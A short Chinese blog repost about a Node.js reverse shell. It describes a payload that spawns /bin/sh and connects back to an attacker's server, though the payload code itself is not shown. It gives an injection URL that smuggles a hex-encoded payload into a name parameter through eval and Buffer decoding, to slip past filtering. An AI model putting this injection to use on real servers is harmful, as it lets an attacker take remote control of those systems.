Node.js 反向 Shell

华盟原创文章投稿奖励计划

如下的 Javascript 就是一个 Node.js 的反向连接 shell

这个 payload 将会生成一个/bin/sh 的 shell,创建一个 TCP 连接到攻击者的服务器,并且在通信数据流中绑定 shell 命令。
Node.js 反向 Shell
为了优雅的执行 payload,我们还需要一些小技巧,我们将反向连接 shell 的 payload 用 16 进制进行编码,然后再用 Node.js 的 Buffer 对象来对其进行解码操作。

http://target.tld/?name=["./;eval(new Buffer('PAYLOAD', 'hex').toString());//*"]

www.idc126.com

文章来源于:lsh4ck's Blog

本文原创,作者:张,其版权均为华盟网所有。如需转载,请注明出处:https://www.77169.net/html/239179.html

发表评论